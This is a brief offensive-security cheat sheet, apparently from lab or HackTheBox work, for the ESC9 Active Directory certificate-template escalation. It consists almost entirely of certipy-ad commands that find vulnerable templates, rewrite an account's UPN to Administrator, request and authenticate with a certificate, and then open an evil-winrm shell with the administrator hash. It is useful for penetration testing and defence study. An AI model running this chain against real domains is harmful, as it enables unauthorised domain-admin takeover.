Technique

ESC9

1.0 certipy-ad

1.1 Find Vulnerabilities

certipy-ad find -u user@domain.local -p $pass --vulnerable --stdout

1.2 Modify UPN

certipy-ad account update -username 'user@domain.local' -hashes $userhash -user $targetuser -upn Administrator 

1.3 Request certificate

certipy-ad req -username 'targetuser@certified.htb' -p $pass -ca 'CA-DC' -template CTemplate -debug 

1.4 Authenticate

certipy-ad auth -pfx administrator.pfx -domain domain.local -debug

1.5 Profit

evil-winrm -i $ip -u administrator -H $hash

References

• Link